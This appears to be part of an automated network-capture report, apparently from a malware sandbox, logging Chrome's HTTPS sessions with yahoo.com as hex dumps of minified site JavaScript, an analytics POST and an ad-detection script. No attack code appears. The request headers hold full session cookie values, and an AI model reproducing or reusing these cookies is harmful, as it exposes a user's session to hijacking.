                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 77 61 66 65 72 3d 74 28 29 3a 65 2e 77 61 66 65 72 3d 74 28 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer",[],t):"object"==typeof exports?exports.wafer=t():e.wafer=t()}("undefined"!=typeof self?self:this,function(){return fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 6e 5b 74 5d 3d 65 5b 74 5d 3b 72 65 74 75 72 6e 20 6e 7d 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3a 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: le:!0,writable:!0}):e[t]=n,e}function c(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)}function u(e){return Array.isArray(e)?e:Array.from(e)}function l(e,t){if(!(e instanceof t))throw new TypeE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 20 45 7d 29 2c 6e 2e 64 28 6d 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 53 75 70 70 6f 72 74 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 29 2c 6e 2e 64 28 6d 2c 22 69 73 54 6f 75 63 68 53 61 66 61 72 69 44 65 76 69 63 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 29 2c 6e 2e 64 28 6d 2c 22 73 6d 6f 6f 74 68 53 63 72 6f 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 29 2c 6e 2e 64 28 6d 2c 22 69 73 50 57 41 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 29 3b 76 61 72 20 79 3d 7b 7d 3b 6e 2e 64 28 79 2c 22 69 73 56 69 73 69 62 6c 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 29 2c 6e 2e 64 28 79 2c 22 64 65 62 6f 75 6e 63 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: E}),n.d(m,"performanceMarkSupported",function(){return T}),n.d(m,"isTouchSafariDevice",function(){return k}),n.d(m,"smoothScroll",function(){return C}),n.d(m,"isPWA",function(){return S});var y={};n.d(y,"isVisible",function(){return G}),n.d(y,"debounce",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 72 61 6d 65 74 65 72 56 61 6c 75 65 42 79 4e 61 6d 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 65 7d 29 2c 6e 2e 64 28 79 2c 22 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 65 7d 29 2c 6e 2e 64 28 79 2c 22 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 65 7d 29 2c 6e 2e 64 28 79 2c 22 75 72 6c 69 66 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 65 7d 29 2c 6e 2e 64 28 79 2c 22 66 65 74 63 68 57 69 74 68 43 61 63 68 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 65 7d 29 2c 6e 2e 64 28 79 2c 22 72 65 6d 6f 76 65 43 6f 6f 6b 69 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rameterValueByName",function(){return _e}),n.d(y,"setTransition",function(){return Ee}),n.d(y,"removeTransition",function(){return Te}),n.d(y,"urlify",function(){return ke}),n.d(y,"fetchWithCache",function(){return Ce}),n.d(y,"removeCookie",function(){ret
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 7d 28 29 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 65 29 72 65 74 75 72 6e 20 74 28 65 29 3b 76 61 72 20 6e 3d 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6e 6e 65 63 74 69 6f 6e 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 6d 6f 7a 43 6f 6e 6e 65 63 74 69 6f 6e 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 77 65 62 6b 69 74 43 6f 6e 6e 65 63 74 69 6f 6e 3b 69 66 28 6e 29 7b 76 61 72 20 72 3d 6e 2e 65 66 66 65 63 74 69 76 65 54 79 70 65 3b 69 66 28 22 73 6c 6f 77 2d 32 67 22 3d 3d 3d 72 7c 7c 22 32 67 22 3d 3d 3d 72 29 72 65 74 75 72 6e 20 65 3d 21 30 2c 74 28 21 30 29 2c 21 30 7d 69 66 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: prototype}(),E=function(){var e=void 0;return new Promise(function(t){if(void 0!==e)return t(e);var n=navigator.connection||navigator.mozConnection||navigator.webkitConnection;if(n){var r=n.effectiveType;if("slow-2g"===r||"2g"===r)return e=!0,t(!0),!0}if(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 75 72 6e 20 65 7d 2c 41 3d 5b 22 72 69 64 22 2c 22 63 72 75 6d 62 22 2c 22 73 75 62 73 63 72 75 6d 62 22 5d 2c 78 3d 7b 6f 6d 69 74 3a 31 2c 22 73 61 6d 65 2d 6f 72 69 67 69 6e 22 3a 31 2c 69 6e 63 6c 75 64 65 3a 31 7d 2c 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 2c 74 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5b 3f 26 5d 22 2b 74 2b 22 3d 5b 5e 26 23 5d 2a 28 23 2e 2a 29 3f 24 22 29 2c 22 24 31 22 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 5b 3f 26 5d 29 22 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: urn e},A=["rid","crumb","subscrumb"],x={omit:1,"same-origin":1,include:1},L=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"",t=arguments[1];return e.replace(new RegExp("[?&]"+t+"=[^&#]*(#.*)?$"),"$1").replace(new RegExp("([?&])"+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 6d 65 64 20 6f 75 74 20 66 6f 72 20 74 69 6d 65 6f 75 74 20 76 61 6c 75 65 20 22 2b 45 2b 22 20 68 61 76 69 6e 67 20 73 74 61 72 74 54 69 6d 65 20 22 2b 61 2b 22 20 61 6e 64 20 65 6e 64 54 69 6d 65 20 22 2b 65 29 29 7d 2c 45 29 3b 54 3d 6d 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 26 26 22 63 61 63 68 65 46 69 72 73 74 22 3d 3d 3d 73 3f 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 2e 67 65 74 28 6f 2c 22 66 65 74 63 68 22 2c 7b 74 69 6d 65 6f 75 74 3a 31 65 33 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 6e 3d 65 2e 74 74 6c 2c 72 3d 65 2e 76 61 6c 75 65 2c 69 3d 65 2e 63 61 63 68 65 64 54 69 6d 65 2c 6f 3d 28 44 61 74 65 2e 6e 6f 77 28 29 2d 69 29 2f 31 65 33 3b 74 72 79 7b 5f 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: med out for timeout value "+E+" having startTime "+a+" and endTime "+e))},E);T=m&&window.wafer.db&&"cacheFirst"===s?window.wafer.db.get(o,"fetch",{timeout:1e3}).then(function(e){if(e){var n=e.ttl,r=e.value,i=e.cachedTime,o=(Date.now()-i)/1e3;try{_=JSON.pa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 28 4f 28 7b 7d 2c 65 2c 7b 5f 66 65 74 63 68 4d 65 74 61 3a 72 7d 29 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 7b 5f 66 65 74 63 68 4d 65 74 61 3a 72 7d 29 7d 29 7d 69 66 28 32 30 30 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 3b 69 66 28 6d 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 64 62 26 26 75 26 26 69 26 26 69 2e 6d 61 74 63 68 28 2f 61 70 70 6c 69 63 61 74 69 6f 6e 5c 2f 6a 73 6f 6e 2f 69 29 29 7b 76 61 72 20 73 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 65 2e 63 6c 6f 6e 65 28 29 2e 74 65 78 74 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .then(function(e){t(O({},e,{_fetchMeta:r}))}).catch(function(){t({_fetchMeta:r})})}if(200===n){var i=e.headers.get("Content-Type");if(m&&window.wafer.db&&u&&i&&i.match(/application\/json/i)){var s=Date.now();e.clone().text().then(function(e){return window
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 74 61 3a 7b 64 75 72 61 74 69 6f 6e 3a 44 61 74 65 2e 6e 6f 77 28 29 2d 61 2c 73 6f 75 72 63 65 3a 63 3c 69 3f 22 43 41 43 48 45 5f 53 45 43 4f 4e 44 5f 41 54 54 45 4d 50 54 22 3a 22 43 41 43 48 45 5f 53 45 43 4f 4e 44 5f 41 54 54 45 4d 50 54 5f 53 54 41 4c 45 22 7d 7d 29 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 65 6c 73 65 20 72 28 65 29 7d 29 7d 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 73 73 65 74 73 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 72 3d 6e 2e 63 73 73 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 5b 5d 3a 72 3b 72 65 74 75 72 6e 20 69 3f 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 69 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ta:{duration:Date.now()-a,source:c<i?"CACHE_SECOND_ATTEMPT":"CACHE_SECOND_ATTEMPT_STALE"}}))}).catch(function(e){r(e)})}else r(e)})}})}).then(function(e){var t=e.assets,n=void 0===t?{}:t,r=n.css,i=void 0===r?[]:r;return i?Promise.all(i.map(function(e){var
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 3d 72 7c 7c 7a 3b 69 66 28 21 69 29 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 74 2c 6e 29 3b 65 2e 68 61 73 28 69 29 7c 7c 65 2e 73 65 74 28 69 2c 6e 65 77 20 4d 61 70 29 3b 76 61 72 20 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 65 2e 67 65 74 28 69 29 2e 64 65 6c 65 74 65 28 6f 29 2c 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 6e 29 7d 2c 6e 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 69 29 2e 73 65 74 28 6f 2c 6f 29 2c 6f 7d 29 2c 63 6c 65 61 72 41 6c 6c 54 69 6d 65 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 65 26 26 65 2e 73 69 7a 65 29 7b 76 61 72 20 74 3d 21 30 2c 6e 3d 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =r||z;if(!i)return setTimeout(t,n);e.has(i)||e.set(i,new Map);var o=setTimeout(function(){var n=Array.prototype.slice.call(arguments);e.get(i).delete(o),t.apply(this,n)},n);return e.get(i).set(o,o),o}),clearAllTimeout:function(){if(e&&e.size){var t=!0,n=!


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    78192.168.2.449840188.125.72.1394434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1124OUTPOST /v2/public/yql?yhlVer=2&yhlClient=rapid&yhlS=2023538075&yhlCT=2&yhlBTMS=1727716858446&yhlClientVer=3.54.3&yhlRnd=wdRGVNX4L3KQai7d&yhlCompressed=3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: udc.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1506OUTData Raw: 71 3d 73 65 6c 65 63 74 25 32 30 2a 25 32 30 66 72 6f 6d 25 32 30 78 25 32 30 77 68 65 72 65 25 32 30 61 25 32 30 25 33 44 25 32 30 27 76 56 5a 4e 63 25 32 42 49 34 45 50 30 76 50 75 77 70 67 44 45 77 51 4b 72 32 6f 47 54 4d 4a 4c 74 4c 50 6d 44 79 4f 61 52 63 73 69 33 62 43 72 61 6c 6b 57 51 37 62 43 72 25 32 46 66 62 74 74 41 69 53 77 65 35 72 61 45 25 32 42 72 58 33 61 39 62 30 6d 75 5a 56 38 75 58 31 76 47 72 35 64 47 75 74 6f 36 74 38 48 64 79 54 55 35 4f 72 76 79 77 6c 54 32 63 75 69 64 68 25 32 46 33 4c 63 75 72 73 54 57 72 57 6d 36 63 43 4c 67 25 32 42 57 6a 66 7a 35 78 59 25 32 46 65 45 58 4c 75 6c 39 25 32 42 33 42 66 52 79 25 32 46 6e 4e 6c 38 53 6a 77 32 4a 59 54 38 4e 6b 63 43 51 73 7a 6b 4c 44 33 58 4e 25 32 46 72 37 37 63 58 4b 75 62 25 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: q=select%20*%20from%20x%20where%20a%20%3D%20'vVZNc%2BI4EP0vPuwpgDEwQKr2oGTMJLtLPmDyOaRcsi3bCralkWQ7bCr%2FfbttAiSwe5raE%2BrX3a9b0muZV8uX1vGr5dGuto6t8HdyTU5OrvywlT2cuidh%2F3LcursTWrWm6cCLg%2BWjfz5xY%2FeEXLul9%2B3BfRy%2FnNl8Sjw2JYT8NkcCQszkLD3XN%2Fr77cXKub%2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC591INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: no-store, no-cache, private, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    p3p: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    79192.168.2.44984587.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC549OUTGET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 9sT4b3rYxjpA4r3jAem3Up+lx4cfFoICPMafX282XW3ieyDSj+iWBrX78b4GRPcV+tbgoKrJf9g=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 83MFND1F77BFKCPV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 10 Sep 2024 09:17:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 May 2020 03:33:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "ca243b22264dca7a4a899c51cc2dc963"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000, public, immutable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC158INData Raw: 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 64 69 76 20 69 64 3d 22 61 64 76 65 72 74 69 73 65 6d 65 6e 74 2d 74 68 61 6d 62 61 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 44 69 73 70 6c 61 79 20 41 64 76 65 72 74 69 73 65 6d 65 6e 74 3c 2f 64 69 76 3e 27 29 3b 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 30 2c 20 59 61 68 6f 6f 21 20 49 6e 63 2e 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    80192.168.2.44984187.248.119.2514434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC715OUTGET /__rapid-worker-1.2.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: uDo4ipV2Y3rW58By1ESf9VlntXtXLQukL4QRLRwzPCCKIaRtHtaEmbzIHpY86qn+CGx35YHOe3Y=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: NRJYVHK167C17DK1
